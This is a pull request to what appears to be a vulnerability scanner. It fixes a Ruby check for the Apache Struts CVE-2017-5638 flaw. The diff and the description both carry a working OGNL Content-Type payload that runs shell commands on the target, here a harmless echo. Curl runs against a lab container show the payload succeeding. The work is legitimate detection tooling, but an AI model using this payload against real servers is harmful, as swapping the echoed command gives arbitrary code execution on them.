### PR TITLE
Fix for Apache Struts Jakarta Parser (CVE-2017-5638) Vuln Check

### DIFF
--- a/lib/tasks/vuln/apache_struts_jakarta_parser.rb
+++ b/lib/tasks/vuln/apache_struts_jakarta_parser.rb
@@ -1,58 +1,56 @@
 module Intrigue
-module Task
-class ApacheStrutsJakartaParser < BaseTask
-
-  def self.metadata
-    {
-      :name => "vuln/apache_struts_jakarta_parser",
-      :pretty_name => "Vuln Check - Apache Struts Jakarta Parser",
-      :identifiers => [{ "cve" =>  "CVE-2017-5638" }],
-      :authors => ["jcran"],
-      :description => "Trigger Apache Struts CVE-2017-5638 Jakarta Parser",
-      :references => [
-        "https://blog.qualys.com/securitylabs/2017/03/14/apache-struts-cve-2017-5638-vulnerability-and-the-qualys-solution"
-      ],
-      :type => "vuln_check",
-      :passive => false,
-      :allowed_types => ["Uri"],
-      :example_entities => [ 
-        {"type" => "Uri", "details" => {"name" => "https://intrigue.io"}} 
-      ],
-      :allowed_options => [],
-      :created_types => []
-    }
-  end
-
-  ## Default method, subclasses must override this
-  def run
-    super
-
-    # first, ensure we're fingerprinted
-    require_enrichment
-
-    uri = _get_entity_name
-
-    headers = {}
-    headers["Content-Type"] = "%{#context[‘com.opensymphony.xwork2.dispatcher.HttpServletResponse’].addHeader(‘X-Intrigue-Struts’,888*888)}.multipart/form-data"
-    response = http_request(:get, uri, nil, headers) # no auth
-
-    unless response
-      _log_error "No response received"
-      return
-    end
-
-    # show the response in the logs 
-    response.each {|x| _log "#{x}: #{response.header[x]}"}
-        
-    if response.header['X-Intrigue-Struts'] =~ /788544/
-      
-      instance_details = { 
-        proof: "#{response.header['X-Intrigue-Struts']}",
+  module Task
+  class ApacheStrutsJakartaParser < BaseTask
+  
+    def self.metadata
+      {
+        :name => "vuln/apache_struts_jakarta_parser",
+        :pretty_name => "Vuln Check - Apache Struts Jakarta Parser",
+        :identifiers => [{ "cve" =>  "CVE-2017-5638" }],
+        :authors => ["jcran"],
+        :description => "Trigger Apache Struts CVE-2017-5638 Jakarta Parser",
+        :references => [
+          "https://blog.qualys.com/securitylabs/2017/03/14/apache-struts-cve-2017-5638-vulnerability-and-the-qualys-solution"
+        ],
+        :type => "vuln_check",
+        :passive => false,
+        :allowed_types => ["Uri"],
+        :example_entities => [ 
+          {"type" => "Uri", "details" => {"name" => "https://intrigue.io"}} 
+        ],
+        :allowed_options => [],
+        :created_types => []
       }
-      _create_linked_issue "apache_struts_jakarta_parser", instance_details
     end
+  
+    ## Default method, subclasses must override this
+    def run
+      super
+  
+      # first, ensure we're fingerprinted
+      require_enrichment
+  
+      uri = _get_entity_name
+  
+      headers = {}
+      headers["Content-Type"] = "%{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='echo intrigue-struts2').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}"
+  
+      response = http_request(:get, uri, nil, headers) # no auth
+  
+      unless response
+        _log_error "No response received"
+        return
+      end
+          
+      if response.body_utf8 =~ /intrigue-struts2/
+        
+        instance_details = { 
+          proof: "#{response.body_utf8}",
+        }
+        _create_linked_issue "apache_struts_jakarta_parser", instance_details
+      end
+    end
+  
   end
-
-end
-end
-end
+  end
+  end


### PR DESCRIPTION
Hi team,

While exploring Core, I've noticed that the vuln-check for `CVE-2017-5638` would return false negatives.

Spinning up a vulnerable instance of apache-struts2-cve-2017-5638 using the following [Docker Image](https://hub.docker.com/r/piesecurity/apache-struts2-cve-2017-5638/), I've noticed that the check would return that the instance is not vulnerable.

After fixing some typos which was causing the script to error out, I decided to fire off the request using curl with the payload that Core is using:

```
$ curl -i -X GET -H "Content-Type: %{#context[‘com.opensymphony.xwork2.dispatcher.HttpServletResponse’].addHeader(‘X-Intrigue-Struts’,888*888)}.multipart/form-data" http://bugbox:8080

HTTP/1.1 302 Found
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=6FCC2E43078AD8D28169DB62A0A07389; Path=/; HttpOnly
Location: showcase.action
Content-Type: text/html
Content-Length: 0
Date: Sun, 04 Oct 2020 20:01:02 GMT
```

As shown in the response, the `X-Intrigue-Struts` header is not returned in the response.

Looking through various CVE-2017-5638 'checker' scripts on Github, I've noticed that all are instead using the payload which will spawn Java's `ProcessBuilder` and therefore have the ability to execute underlying system commands.

With that in mind, I've attempted to use the following payload which will work on both operating systems (UNIX/Windows) by executing a harmless echo command:

```
%{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='echo intrigue-struts2').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}
```

Issuing the request using curl:

```
$ curl -i -X GET -H "Content-Type: %{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='echo intrigue-struts2').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}" http://bugbox:8080


HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Transfer-Encoding: chunked
Date: Sun, 04 Oct 2020 20:07:30 GMT

intrigue-struts2
curl: (18) transfer closed with outstanding read data remaining
```

As shown in the response, `intrigue-struts2` is returned therefore confirming this host is in fact vulnerable.

Curious to hear your thoughts and if there are any additional ways to confirm whether or not the host is vulnerable without needing to execute commands.

Best regards,
Maxim
